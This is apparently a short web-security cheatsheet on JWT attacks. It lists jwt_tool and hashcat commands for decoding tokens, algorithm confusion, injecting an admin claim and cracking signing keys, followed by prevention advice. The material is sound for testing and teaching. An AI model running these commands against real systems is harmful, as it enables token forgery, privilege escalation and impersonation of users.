KaraboSec_
Back to Web

Jwt Attacks

Web cheatsheet — Web application enumeration and exploitation techniques.

Overview

JWT (JSON Web Token) attacks target the JSON Web Token implementation used for authentication and authorization. Common vulnerabilities include using the "none" algorithm, algorithm confusion (RS256 vs HS256), weak signing keys, and token manipulation.

JWT attacks can allow attackers to forge tokens, escalate privileges, or impersonate other users.

Category: WebWeb application enumeration and exploitation techniques.

Key Commands & Payloads

The following commands and payloads are commonly used when testing for or exploiting Jwt Attacks:

echo 'token' | cut -d. -f2 | base64 -d 2>/dev/null
jwt_tool <token> -X k -pk public.pem
jwt_tool <token> -I -pc username -pv admin
hashcat -m 16500 jwt.txt wordlist.txt
jwt_tool <token> -C -d wordlist.txt

Tools & Techniques

Recommended tools for Jwt Attacks:

  • jwt.io: online JWT debugger/decoder
  • jwt_tool: Python-based JWT testing toolkit
  • jwt-cracker: Node.js brute-force tool
  • Hashcat: mode 16500 for JWT cracking
  • Manual: modify alg to 'none', change claims, swap algorithms

Prevention & Mitigation

Security recommendations to prevent Jwt Attacks:

  • Always validate the 'alg' header against an allowlist
  • Use strong, unique signing keys (256+ bits entropy)
  • Implement short token expiration times
  • Use asymmetric algorithms (RS256/ES256) over symmetric (HS256)
  • Validate all claims (iss, aud, exp, nbf) server-side
  • Rotate signing keys periodically

References

Additional resources: